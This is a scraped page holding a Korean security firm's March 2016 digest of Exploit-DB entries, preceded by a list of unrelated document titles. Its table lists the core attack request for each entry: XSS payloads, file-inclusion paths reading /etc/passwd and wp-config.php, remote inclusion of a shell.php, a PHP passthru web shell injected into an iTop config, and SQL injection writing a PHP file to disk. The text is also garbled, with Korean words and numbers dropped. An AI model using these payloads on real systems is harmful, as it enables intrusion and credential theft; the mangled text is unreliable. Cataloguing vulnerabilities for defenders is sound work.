EDB 분석보고서 (06.03) ~ Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. 날짜 EDB 번호분류공격난이도공격위험도이름핵심공격코드대프로그램대환경 File Upload 하 C

Similar documents
76 XSS 하 Huge-IT Slider admin.php XSS

EDB 분석보고서 (04.06) ~ Exploit-DB( 에공개된별로분류한정보입니다. Directory Traversal users-x.php 4.0 -support-x.php 4.0 time-

** 5 개이발생한주요소프트웨어별취약점세 EDB 번호취약점종류공격난이도공격위험도취약점이름소프트웨어이름

36802 Tune Library / 중 NEX-Forms < admin-ajax.php 하 중 Ultimate Product Catalogue - / 하 중 Ultimate Product Catalogue - ad

EDB 분석보고서 (04.03) ~ Exploit-DB( 에공개된별로분류한정보입니다. ** 5개이상발생한주요소프트웨어별상세 EDB 번호 종류 공격난이도 공격위험도 이름 소프트웨어이름 3037 SQL Inj

EDB 분석보고서 (05.0) ~ Exploit-DB( 에공개된별로분류한정보입니다 SQL Injection 하 상 u5cms localize.php SQL U5cms 3607 SQL

EDB 분석보고서 (06.07) ~ Exploit-DB( 에공개된취약점별로분류한정보입니다 SQL Injection 하중 index.php SQL Injection 취

EDB 분석보고서 (0.0) 0.0.0~0.0. Exploit-DB( 에공개된별로분류한정보입니다. 날짜 EDB 번호분류공격난이도공격위험도이름핵심공격코드대상프로그램대상환경 SQL Injection 중상 Absolu

EDB 분석보고서 (04.09) ~ Exploit-DB( 에공개된취약점별로분류한정보입니다 SQL Injection Like Dislike Counter..3 Plugin - ajax_coun

날짜 EDB 번호취약점분류공격난이도공격위험도취약점이름핵심공격코드대프로그램대환경 Directory Traversal 하 EDB 분석보고서 (05.0) ~ Exploit-DB( 에공개된취약

EDB 분석보고서 (208.0) ~ Exploit-DB( 에공개된취약점별로분류한정보입니다 SQL Injection Smart Google Code Inserter < 3.5 P

EDB 분석보고서 (05.08) ~ Exploit-DB( 에공개된별로분류한정보입니다. 날짜 EDB 번호분류공격난이도공격위험도이름핵심공격코드대상프로그램대상환경 7/08/ File Upload 하중.

POST /process.php HTTP/ XSS 중중 Command Injection 상상 EPESI.8.2 rev XSS ClipBucket Remote Code Execution

EDB 분석보고서 (06.0) ~ Exploit-DB( 에공개된별로분류한정보입니다. 날짜 EDB번호 분류 공격난이도 공격위험도 이름 핵심공격코드 대상프로그램 대상환경 /picosafe_webgui/webint

EDB 분석보고서 (06.0) ~ Exploit-DB( 에공개된취약점별로분류한정보입니다 PHP Imagick / command injection 취약점 /image.j

3708 하 중 Landing Pages Plugin post.php 3708 XSS 하 중 Landing Pages Plugin post-new.php 3707 하 중 NewStatPress Plugin admin.php 3707

제목 레이아웃

105È£4fš

<C0CCBCBCBFB52DC1A4B4EBBFF82DBCAEBBE7B3EDB9AE2D D382E687770>

Ç¥Áö

ORANGE FOR ORACLE V4.0 INSTALLATION GUIDE (Online Upgrade) ORANGE CONFIGURATION ADMIN O

Secure Programming Lecture1 : Introduction

Macaron Cooker Manual 1.0.key

PowerPoint Presentation

단계

Windows 8에서 BioStar 1 설치하기

2006_8_14 (8_17 updated) ms ¿ú(wgareg.exe) ºÐ¼® º¸°í¼�.hwp

2011년 10월 초판 c 2011 Sony Corporation. All rights reserved. 서면 허가 없이 전체 또는 일부를 복제하는 것을 금합니다. 기능 및 규격은 통보 없이 변경될 수 있습니다. Sony와 Sony 로고는 Sony의 상표입니다. G L

CD-RW_Advanced.PDF

Observational Determinism for Concurrent Program Security

PowerPoint プレゼンテーション

第 1 節 組 織 11 第 1 章 檢 察 의 組 織 人 事 制 度 등 第 1 項 大 檢 察 廳 第 1 節 組 대검찰청은 대법원에 대응하여 수도인 서울에 위치 한다(검찰청법 제2조,제3조,대검찰청의 위치와 각급 검찰청의명칭및위치에관한규정 제2조). 대검찰청에 검찰총장,대

<4D F736F F D2033BFF920BECBBEE0BFF9B0A3BAB8B0EDBCAD2E646F6378>

User's Guide Manual

API STORE 키발급및 API 사용가이드 Document Information 문서명 : API STORE 언어별 Client 사용가이드작성자 : 작성일 : 업무영역 : 버전 : 1 st Draft. 서브시스템 : 문서번호 : 단계 : Docum

VOL /2 Technical SmartPlant Materials - Document Management SmartPlant Materials에서 기본적인 Document를 관리하고자 할 때 필요한 세팅, 파일 업로드 방법 그리고 Path Type인 Ph

< FC8A8C6E4C0CCC1F620B0B3B9DF20BAB8BEC8B0A1C0CCB5E5C3D6C1BE28C0FAC0DBB1C7BBE8C1A6292E687770>

Week13

data_ hwp

Microsoft Word - junior.docx

¿ÀǼҽº°¡À̵å1 -new

untitled

1217 WebTrafMon II

XSS Attack - Real-World XSS Attacks, Chaining XSS and Other Attacks, Payloads for XSS Attacks

취약점분석보고서 Simple Web Server 2.2 rc2 Remote Buffer Overflow Exploit RedAlert Team 안상환

SQL Developer Connect to TimesTen 유니원아이앤씨 DB 기술지원팀 2010 년 07 월 28 일 문서정보 프로젝트명 SQL Developer Connect to TimesTen 서브시스템명 버전 1.0 문서명 작성일 작성자

DocsPin_Korean.pages

PowerPoint Template

³»Áö¼öÁ¤

내지무인화_

게시판 스팸 실시간 차단 시스템

manual pdfÃÖÁ¾

<4D F736F F F696E74202D20B5A5C0CCC5CDBAA3C0CCBDBA5F3130C1D6C2F75F32C2F7BDC32E >

EDB 분석보고서 (06.06) ~ Exploit-DB( 에공개된별로분류한정보입니다. 날짜 EDB 번호분류공격난이도공격위험도이름핵심공격코드대상프로그램대상환경 Code

<4D F736F F F696E74202D E20C0CEC5CDB3DD20C0C0BFEB20B9D720BCADBAF1BDBA20B1E2BCFA E >

EndNote X2 초급 분당차병원도서실사서최근영 ( )

vm-웨어-01장

EDB 분석보고서 (05.03) ~ Exploit-DB( 에공개된별로분류한정보입니다 상 상 Spider FAQ - index.php 상 Gallery WD - index.php 36

초보자를 위한 ADO 21일 완성

Chapter 1

PowerPoint 프레젠테이션

초보자를 위한 C++

0. 들어가기 전

1

Social Network

PowerPoint Presentation

PowerPoint 프레젠테이션

슬라이드 제목 없음

접근성과 웹 The power of the Web is in its universality. Access by everyone regardless of disability is an essential aspect. Tim Berners-Lee, the inventor

인도 웹해킹 TCP/80 apache_struts2_remote_exec-4(cve ) 인도 웹해킹 TCP/80 apache_struts2_remote_exec-4(cve ) 183.8

Adobe Flash 취약점 분석 (CVE )

Microsoft Word - SKINFOSEC-CHR-026- Mass SQL Injection 탐지 우회분석 보고서.doc

AGENDA 모바일 산업의 환경변화 모바일 클라우드 서비스의 등장 모바일 클라우드 서비스 융합사례

fashion jewelry 시장성 조사

Cover_KD-R646[U]004A_1.indd 2 2

품질검증분야 Stack 통합 Test 결과보고서 [ The Bug Genie ]

ÀÎÅÍ³Ý ÁøÈï¿ø 5¿ù

알아 둘 사항 아이오드 제조사는 본 기기에 하드디스크를 포함하여 출고하지 않습니다. 따라서 하드디스크에 문제가 발생할 경우, 구매처 또는 해당 하드디스크 서비 스센터에 문의 하시기 바랍니다. 정해진 용도 외의 사용으로 발생한 문제에 대해서, 당사는 어떠한 책임도 지지

,,,,,, (41) ( e f f e c t ), ( c u r r e n t ) ( p o t e n t i a l difference),, ( r e s i s t a n c e ) 2,,,,,,,, (41), (42) (42) ( 41) (Ohm s law),

WEB Hacking 한국디지털미디어고등학교, T eampur e, JT JSOFT 장태 진

특허청구의 범위 청구항 1 몸체(110)의 일측에는 테스트의 필요성에 따라 여타한 디젤 자동차(100)에서 분리시킨 상태의 분리형 커먼레일 인젝트(110)를 고정할 수 있는 분리형 인젝터 고정부(20)가 구비되고, 그 고정부(20)의 하측에는 분리형 커먼 레일 인젝터(

기술문서 작성 XXE Attacks 작성자 : 인천대학교 OneScore 김영성 I. 소개 2 II. 본문 2 가. XML external entities 2 나. XXE Attack 3 다. 점검방법 3 라.

취약점분석보고서 [Photodex ProShow Producer v ] RedAlert Team 안상환

Web Scraper in 30 Minutes 강철

무제-1

3장

Cloud Friendly System Architecture

DE1-SoC Board

partprime_intro.key

Analytics > Log & Crash Search > Unity ios SDK [Deprecated] Log & Crash Unity ios SDK. TOAST SDK. Log & Crash Unity SDK Log & Crash Search. Log & Cras

untitled


*****

3ÆÄÆ®-14

s SINUMERIK 840C Service and User Manual DATA SAVING & LOADING & & /

Sena Device Server Serial/IP TM Version

FMX M JPG 15MB 320x240 30fps, 160Kbps 11MB View operation,, seek seek Random Access Average Read Sequential Read 12 FMX () 2

HTML5가 웹 환경에 미치는 영향 고 있어 웹 플랫폼 환경과는 차이가 있다. HTML5는 기존 HTML 기반 웹 브라우저와의 호환성을 유지하면서도, 구조적인 마크업(mark-up) 및 편리한 웹 폼(web form) 기능을 제공하고, 리치웹 애플리케이 션(RIA)을

Portal_9iAS.ppt [읽기 전용]

untitled

Transcription:

EDB 분석보고서 (06.03) 06.03.0~06.03.3 Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. 분석내용정리 ( 작성 : 펜타시큐리티시스템보안성평가팀 ) 06 년 3 월에공개된 Exploit-DB 의분석결과, Local File Inclusion 공격에대한보고개수가가장많았습니다. Local File Inclusion 공격은주로 Directory Traversal 공격과함께이루어지는공격으로대파일이공격대서버에위치해있을때발생할수있습니다. Local File Inclusion 공격은파라미터값의경로를단순조작하는형태의쉬운공격입니다. 해당공격은시스템파일이유저에게노출되는피해를일으키기때문에난이도에비해위험도가매우높은입니다. Local File Inclusion 공격을예방하기위한가장좋은방법은소스코드를안전하게수정하는것입니다. 하지만사이트의규모가커서해당서버의모든입력값을검증하기어려운황이라면웹방화벽을도입하는것이현실적으로적절한방안입니다. 주요소프트웨어별발생현황을보면 Open Source CMS 로널리알려져있는 에서가장많은이보고되었습니다. 분석된 들은 자체의이라기보다주로신규 Plugin 들의이었습니다. 를사용하는관리자는사용인 Plguin 들의보안패치를실시하여서버가에노출되지않도록주의하여야합니다.. 별보고개수 보고개수 Code Injection File Upload SQL Injection 4 RFI 4 XSS 0 LFI 3 총합계 33 4 0 8 6 4 별보고개수 4 4 0 3 0 Code Injection File Upload SQL Injection RFI XSS LFI. 위험도별분류위험도 보고개수 백분율 6 8.8% 7 8.8% 합계 33 00.00% 위험도별분류 7 6 3. 공격난이도별현황공격난이도 보고개수 백분율 3 9.09% 3 9.09% 하 7 8.8% 총합계 33 00.00% 공격난이도별현황 3 3 7 하 4. 주요소프트웨어별발생현황 소프트웨어이름 보고개수 0 PivotX itop Joomla Monstra 총합계 33 주요소프트웨어별발생현황 0 PivotX itop Joomla Monstra ** 5개이발생한주요소프트웨어별세 EDB 번호 종류 공격난이도 공격위험도 이름 소프트웨어이름 3953 File Upload 하 CP Polls Plugin.0.8 - admin.php XSS 39547 XSS 하 Best Web Soft Captcha Plugin <= 4..5 - admin.php XSS () 39548 XSS 하 WP Advanced Comment Plugin 0.0 - / XSS 39547 XSS 하 Best Web Soft Captcha Plugin <= 4..5 - admin.php XSS 39553 XSS 하 DZS Videogallery Plugin <=8.60 - popup.php XSS 39553 XSS 하 DZS Videogallery Plugin <=8.60 - ajax.php XSS 39558 LFI 하 Site Import Plugin.0. - page.php LFI 39558 RFI 하 Site Import Plugin.0. - page.php RFI 39584 LFI 하 Image Export Plugin..0 - download.php LFI 39577 LFI 하 Abtest Plugin - abtest_admin.php LFI 39575 LFI 하 ebook Download Plugin. - filedownload.php LFI 39593 LFI 하 Memphis Document Library Plugin 3..5 - / LFI 39593 LFI 하 Memphis Document Library Plugin 3..5 - /mdocs-posts/ LFI 3959 LFI 하 Dharma booking Plugin.38.3 - proccess.php LFI 3959 RFI 하 Dharma booking Plugin.38.3 - proccess.php RFI 3959 LFI 하 Brandfolder Plugin 3.0 - callback.php LFI 3959 RFI 하 Brandfolder Plugin 3.0 - callback.php RFI 39589 LFI 하 HB Audio Gallery Lite Plugin.0.0 - audio-download.php LFI 3963 LFI 하 Photocart Link Plugin.6 - decode.php LFI 396 LFI 하 Plugin IMDb Profile Widget.0.8 - pic.php LFI

EDB 분석보고서 (06.03) 06.03.0~06.03.3 Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. 날짜 EDB 번호분류공격난이도공격위험도이름핵심공격코드대프로그램대환경 06-03-0 3953 File Upload 하 CP Polls Plugin.0.8 - admin.php XSS POST /wpadmin/admin.php?page=cp_polls&cal=&list=&i mport= HTTP/. Connection: CloseAccept: text/html, application/xhtml+xml, */* Accept-Language: ko-kr User-Agent: Mozilla/5.0 (compatible; MSIE 0.0; Windows NT 6.; WOW64; Trident/6.0) Content-Type: multipart/form-data; boundary=---- -----------------------7dd009908f CP Polls Plugin.0.8 -----------------------------7dd009908f name="importfile"; filename="csv.csv" Content-Type: application/octet-stream <img src=x onerror=alert('you_are_owned!') -----------------------------7dd009908f-- 06-03-0 39547 XSS 하 Best Web Soft Captcha Plugin <= 4..5 - admin.php XSS () /wpadmin/admin.php?page=captcha.php&action=whi telist&s=%3cscript%3ealert%8%9%3b%3c %Fscript%3E Best Web Soft Captcha Plugin <= 4.. 06-03-0 39548 XSS 하 POST / HTTP/. Connection: CloseAccept: text/html, application/xhtml+xml, */* Accept-Language: ko-kr User-Agent: Mozilla/5.0 (compatible; MSIE 0.0; Windows NT 6.; WOW64; Trident/6.0) Content-Type: multipart/form-data; boundary=---- -----------------------7dd009908f WP Advanced Comment Plugin 0.0 - / XSS 취약 -----------------------------7dd009908f 점 name="comment[meta_value]" WP Advanced Comment Plugin 0.0 Hack <script>alert("hacked")</script> -----------------------------7dd009908f name="comment[meta_key]" comment -----------------------------7dd009908f-- 06-03-0 39547 XSS 하 Best Web Soft Captcha Plugin <= 4..5 - admin.php XSS POST /wpadmin/admin.php?page=captcha.php&action=whi telist HTTP/. Best Web Soft Captcha Plugin <= 4.. s=<script>alert();</script>&search IP=Click here to claim your prize! 06-03- 39553 XSS 하 /wp-content/plugins/dzsvideogallery/admin/playlistseditor/popup.php?inite DZS Videogallery Plugin <=8.60 - popup.php XSS 취 r=whatava864%7%3balert%8%9%f% 약점 f645 DZS Videogallery Plugin <=8.6 06-03- 39553 XSS 하 DZS Videogallery /wp-content/plugins/dzsvideogallery/ajax.php?height=&source=6d7f"><s Plugin <=8.60 - ajax.php XSS cript>alert()<%fscript>894ba&type=&width= DZS Videogallery Plugin <=8.6 06-03-4 39558 LFI 하 Site Import Plugin.0. - page.php LFI /wp-content/plugins/siteimport/admin/page.php?url=..\..\..\..\..\..\.. \..\..\..\..\..\..\..\..\..\windows\win.ini Site Import Plugin.0. 06-03-4 39558 RFI 하 Site Import Plugin.0. - page.php RFI /wp-content/plugins/siteimport/admin/page.php?url=http%3a%f%floc alhost%fshell.php?shell=ls Site Import Plugin.0.

EDB 분석보고서 (06.03) 06.03.0~06.03.3 Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. 날짜 EDB 번호분류공격난이도공격위험도이름핵심공격코드대프로그램대환경 06-03-4 39559 SQL Injection..4 - item.query.php SQL Injection POST /source/item.query.php HTTP/... type=action_on_quick_icon&id=(select (CASE WHEN (644=644) THEN 644 ELSE 644*(SELECT 644 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))&action= 06-03-4 39559 SQL Injection..4 - view.query.php SQL Injection POST /source/view.query.php HTTP/... type=connections_logs&order=(select (CASE WHEN (6688=6688) THEN 6688 ELSE 6688*(SELECT 6688 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))&direction=DESC POST /monstra-3.0.3/users/8/edit HTTP/. 06-03-6 39567 XSS 하 Monstra CMS 3.0.3 - /monstra- 3.0.3/users/8/edit XSS csrf=685bba70d44b8b877937b56f5b87e669 35fe&user_id=8&login=user&firstname=%%3 E%3Cscript%3Ealert%8%9%3B%3C%Fscri pt%3e&lastname=%%3e%3cscript%3ealert %8%9%3B%3C%Fscript%3E&email=% %3E%3Cscript%3Ealert%8%9%3B%3C%F script%3e&twitter=%%3e%3cscript%3ealert %8%9%3B%3C%Fscript%3E&skype=% %3E%3Cscript%3Ealert%8%9%3B%3C%F script%3e&about_me=%%3e%3cscript%3eal ert%8%9%3b%3c%fscript%3e&new_pass word=&edit_profile=save Monstra Monstra CMS 3.0. 06-03-7 3957 RFI 하 06-03-7 3957 LFI 06-03-7 3957 LFI.4. - admin-logs.php RFI PivotX.3. - index.php LFI PivotX.3. - ajaxhelper.php LFI /zp-core/adminlogs.php?action=download_log&page=logs&tab= http://localhost/shell.php%3f%78%3d%69%64 %6%66%6f%6f%3d&filename=security&XSRFT oken=afd5bafed79d837486fdbeea8f87bc 9dea /pivotx_latest/pivotx/index.php?page=media&del=...//...//...//...//...//...//...//...//...//...//...//...// important/important.file&pivotxsession=ovyyn4ob jc5ym9 /pivotx_latest/pivotx/ajaxhelper.php?function=vie w&basedir=l3zhci93d3cvcglb3r4xxhdgvzdc9 CYXNlZGlyLwo=&file=../...//...//...//...//...//...//....//...//...//...//...//...//etc/passwd.4. PivotX PivotX.3. PivotX PivotX.3. 06-03- 39588 XSS 하 r58 - index.php XSS POST /my_files/index.php HTTP/. r58 search=%%3e%3cscript%3ealert%8%7xs S%7%9%3B%3C%Fscript%3E 06-03- 39588 XSS 하 r58 - clients.php XSS POST /clients.php HTTP/. r58 search=%%3e%3cscript%3ealert%8%7xs S%7%9%3C%Fscript%3E

EDB 분석보고서 (06.03) 06.03.0~06.03.3 Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. 날짜 EDB 번호분류공격난이도공격위험도이름핵심공격코드대프로그램대환경 06-03- 39587 Code Injection itop.. - config.php Code Injection POST /env-production/itopconfig/config.php?c%5bmenu%5d=configeditor HTTP/. operation=save&prev_config=&new_config=<? if(isset($_get['cmd'])) die(passthru($_get['cmd']));?> itop itop.. 06-03- 39584 LFI 하 Image Export Plugin..0 - download.php LFI /wp-content/plugins/imageexport/download.php?file=../../../wp-config.php Image Export Plugin..0 06-03- 39577 LFI 하 06-03- 39575 LFI 하 06-03- 39593 LFI 하 06-03- 39593 LFI 하 Abtest Plugin - abtest_admin.php LFI ebook Download Plugin. - filedownload.php LFI Memphis Document Library Plugin 3..5 - / LFI Memphis Document Library Plugin 3..5 - /mdocsposts/ LFI /wpcontent/plugins/abtest/abtest_admin.php?action=../../etc/passwd /wp-content/plugins/ebookdownload/filedownload.php?ebookdownloadurl=../../../wp-config.php /?mdocs-img-preview=../../../wp-config.php /mdocs-posts/?mdocs-img-preview=../../../wpconfig.php Abtest Plugin ebook Download Plugin. Memphis Document Library Plugin 3..5 Memphis Document Library Plugin 3..5 06-03- 3959 LFI 하 Dharma booking Plugin.38.3 - proccess.php LFI /wp/dharmabooking/frontend/ajax/gateways/proccess.php?ga teway=../../../../../../etc/passwd%00 Dharma booking Plugin.38.3 06-03- 3959 RFI 하 Dharma booking Plugin.38.3 - proccess.php RFI /wp/dharmabooking/frontend/ajax/gateways/proccess.php?ga teway=http://www.example.com/index.php Dharma booking Plugin.38.3 06-03- 3959 LFI 하 Brandfolder Plugin 3.0 - callback.php LFI /wp/wpcontent/plugins/brandfolder/callback.php?wp_abs path=../../../wp-config.php%00 Brandfolder Plugin 3.0 06-03- 3959 RFI 하 Brandfolder Plugin 3.0 - callback.php RFI /wp/wpcontent/plugins/brandfolder/callback.php?wp_abs path=http://www.example.com/index.php Brandfolder Plugin 3.0 06-03- 39590 SQL Injection 하 Joomla Easy Youtube Gallery /index.php?option=com_easy_youtube_gallery&vie.0. - index.php SQL Injection 취 w=videos&mycategory=0%7%0or%0%7% 약점 7=%7%7&defaultvideo=9&Itemid=75 Joomla Joomla Easy Youtube Gallery.0. 06-03- 39589 LFI 하 HB Audio Gallery Lite Plugin.0.0 - audiodownload.php LFI /wp-content/plugins/hb-audio-gallerylite/gallery/audiodownload.php?file_path=../../../../wpconfig.php&file_size=0 HB Audio Gallery Lite Plugin.0.0 06-03-7 3963 LFI 하 Photocart Link Plugin.6 - decode.php LFI /wp-content/plugins/photocartlink/decode.php?id=li4vli4vli4vd3aty9uzmlnln BocA== Photocart Link Plugin.6 06-03-7 396 LFI 하 06-03-8 3966 XSS 하 Plugin IMDb Profile Widget.0.8 - pic.php LFI 5.. - /user/test/home XSS /wp-content/plugins/imdbwidget/pic.php?url=../../../wp-config.php POST /user/test/home?p_p_id=79&p_p_lifecycle=&p_p _state=maximized&p_p_mode=view&_79_struts_a ction=%fenterprise_admin%fedit_user HTTP/. Plugin IMDb Profile Widget.0.8 5.. _79_jobTitle="><script>alert();</script>

EDB 분석보고서 (06.03) 06.03.0~06.03.3 Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. 날짜 EDB 번호분류공격난이도공격위험도이름핵심공격코드대프로그램대환경 06-03-30 39637 SQL Injection 6.0.0 - admin.php SQL Injection /admin.php?_g=products&cat_id=&sort[updated ]=DESC&char=T]%7%0UNION%0SELECT% 0,,3,4,5,6,7,8,9,'<? phpinfo();?>',,,3,4,5,6,7,8,9,0,,,3,4,5,6,7,8,9,0,,,3,4, 5,6,7,8%0INTO%0OUT FILE%0'/var/www/site/file.php'%0--%0 6.0.0 06-03-30 39637 XSS 하 6.0.0 - index.php XSS POST /index.php?_a=profile HTTP/. 6.0.0 first_name=" onmouseover="javascript:alert(/immuniweb/);"